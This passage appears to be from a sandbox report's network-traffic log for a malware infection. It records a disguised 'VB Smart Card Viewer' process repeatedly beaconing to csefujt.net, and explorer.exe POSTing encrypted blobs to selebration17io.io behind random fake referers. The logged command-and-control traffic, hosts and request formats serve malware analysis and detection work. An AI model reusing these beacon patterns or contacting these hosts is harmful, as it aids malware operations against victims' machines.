User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:13:49.118072033 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 05 Feb 2024 11:13:49 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.6 | 49767 | 185.196.8.22 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:13:49.456620932 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
Host: csefujt.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:13:49.693525076 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 05 Feb 2024 11:13:49 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:49.804976940 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:50.042098999 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:13:49 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.2.6 | 49768 | 185.196.8.22 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:13:50.378453016 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
Host: csefujt.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:13:50.618350029 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 05 Feb 2024 11:13:50 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.2.6 | 49769 | 185.196.8.22 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:13:50.942732096 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
Host: csefujt.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:13:51.184355021 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 05 Feb 2024 11:13:51 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.2.6 | 49770 | 185.196.8.22 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:13:51.529531002 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
Host: csefujt.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:13:51.765952110 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 05 Feb 2024 11:13:51 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.6 | 49771 | 185.196.8.22 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:13:52.097227097 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
Host: csefujt.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:13:52.339392900 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 05 Feb 2024 11:13:52 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.2.6 | 49772 | 185.196.8.22 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:13:52.684153080 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
Host: csefujt.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:13:52.921152115 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 05 Feb 2024 11:13:52 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.2.6 | 49774 | 185.196.8.22 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:13:53.267543077 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
Host: csefujt.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:13:53.509623051 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 05 Feb 2024 11:13:53 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.2.6 | 49775 | 185.196.8.22 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:13:54.142329931 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
Host: csefujt.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:13:54.387175083 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 05 Feb 2024 11:13:54 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
38 | 192.168.2.6 | 49776 | 185.196.8.22 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:13:55.374383926 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
Host: csefujt.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:13:55.615428925 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 05 Feb 2024 11:13:55 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
39 | 192.168.2.6 | 49777 | 185.196.8.22 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:13:55.982300997 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
Host: csefujt.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:13:56.230501890 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 05 Feb 2024 11:13:56 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.2.6 | 49778 | 185.196.8.22 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:13:56.576025963 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
Host: csefujt.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:13:56.812817097 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 05 Feb 2024 11:13:56 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
41 | 192.168.2.6 | 49779 | 91.215.85.120 | 80 | 4004 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:13:56.957969904 CET | 284 | OUT | POST /index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://yasjbpuumvei.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 112
Host: selebration17io.io
Feb 5, 2024 12:13:56.958000898 CET | 112 | OUT | Data Raw: 48 9d 8b c9 4b 61 57 21 57 03 52 2f 7b ac 23 c1 2f 6d ed 11 f9 19 d8 ac b5 1a ab 80 71 f4 d1 97 fc af 8e c0 00 45 e2 b2 a2 2e 6a 71 82 83 f0 0f 98 4a 2c 2c 50 c5 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 ba 8a 14 62 cc d6 4f 96 82 dc 32 e1
Data Ascii: HKaW!WR/{#/mqE.jqJ,,P;}f=B!bO2n>$U8&C#]-
Feb 5, 2024 12:13:57.214735985 CET | 194 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.18.0
Date: Mon, 05 Feb 2024 11:13:57 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7=[0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
42 | 192.168.2.6 | 49780 | 185.196.8.22 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:13:57.254271984 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
Host: csefujt.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:13:57.496530056 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 05 Feb 2024 11:13:57 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
43 | 192.168.2.6 | 49781 | 91.215.85.120 | 80 | 4004 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:13:57.681674004 CET | 283 | OUT | POST /index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://jblcvnhdfmo.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 224
Host: selebration17io.io
Feb 5, 2024 12:13:57.681704998 CET | 224 | OUT | Data Raw: 48 9d 8b c9 4b 61 57 21 57 03 52 2f 7b ac 23 c1 2f 6d ed 11 f9 19 d8 ac b5 1a ab 80 71 f4 d1 97 fc af 8e c0 00 45 e2 b2 a2 2e 6a 71 82 83 f0 0f 98 4a 2c 2c 50 c5 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 ba 8a 14 62 cc d6 4f 96 ff a0 39 a3
Data Ascii: HKaW!WR/{#/mqE.jqJ,,P;}f=B!bO9""F0efN'5)aWn=]0+M:i2xx5!896k~?4|ENh[>j-F&y&If./96i
Feb 5, 2024 12:13:57.938400030 CET | 194 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.18.0
Date: Mon, 05 Feb 2024 11:13:57 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7=[0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
44 | 192.168.2.6 | 49782 | 185.196.8.22 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:13:57.873055935 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
Host: csefujt.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:13:58.118633986 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 05 Feb 2024 11:13:58 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
45 | 192.168.2.6 | 49783 | 185.196.8.22 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:13:58.471899033 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
Host: csefujt.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:13:58.708695889 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 05 Feb 2024 11:13:58 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
46 | 192.168.2.6 | 49784 | 91.215.85.120 | 80 | 4004 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:13:59.004014969 CET | 287 | OUT | POST /index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://fisqpaapeirybum.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 333
Host: selebration17io.io
Feb 5, 2024 12:13:59.004050016 CET | 333 | OUT | Data Raw: 48 9d 8b c9 4b 61 57 21 57 03 52 2f 7b ac 23 c1 2f 6d ed 11 f9 19 d8 ac b5 1a ab 80 71 f4 d1 97 fc af 8e c0 00 45 e2 b2 a2 2e 6a 71 82 83 f0 0f 98 4a 2c 2c 50 c5 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 ba 8a 14 62 cc d6 4f 96 b1 b5 5f bd
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: HKaW!WR/{#/mqE.jqJ,,P;}f=B!bO_ro0G-8fk?z!&0eU"7\ur1-U)\!@&\.Z]@$a"><)<WsNJVoLKHknPuPo
Feb 5, 2024 12:13:59.256357908 CET | 194 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.18.0
Date: Mon, 05 Feb 2024 11:13:59 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7=[0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
47 | 192.168.2.6 | 49785 | 185.196.8.22 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:13:59.061580896 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
Host: csefujt.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:13:59.304462910 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 05 Feb 2024 11:13:59 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
48 | 192.168.2.6 | 49786 | 185.196.8.22 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:13:59.703879118 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
Host: csefujt.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:13:59.940912008 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 05 Feb 2024 11:13:59 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
49 | 192.168.2.6 | 49787 | 185.196.8.22 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:00.312777996 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
Host: csefujt.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:14:00.556809902 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 05 Feb 2024 11:14:00 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
50 | 192.168.2.6 | 49788 | 91.215.85.120 | 80 | 4004 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:00.697498083 CET | 287 | OUT | POST /index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://apflwtmswtngbhc.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 290
Host: selebration17io.io
Feb 5, 2024 12:14:00.697544098 CET | 290 | OUT | Data Raw: 48 9d 8b c9 4b 61 57 21 57 03 52 2f 7b ac 23 c1 2f 6d ed 11 f9 19 d8 ac b5 1a ab 80 71 f4 d1 97 fc af 8e c0 00 45 e2 b2 a2 2e 6a 71 82 83 f0 0f 98 4a 2c 2c 50 c5 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 ba 8a 14 62 cc d6 4f 96 fc cb 40 c7
Data Ascii: HKaW!WR/{#/mqE.jqJ,,P;}f=B!bO@/^mBq1Gg8[%So3q-2rp-9$UbfVLWv-#w)ySf]akJ>dL1qiEfk56@
Feb 5, 2024 12:14:00.954190969 CET | 194 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.18.0
Date: Mon, 05 Feb 2024 11:14:00 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7=[0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
51 | 192.168.2.6 | 49789 | 185.196.8.22 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:00.939879894 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
Host: csefujt.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:14:01.182001114 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 05 Feb 2024 11:14:01 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
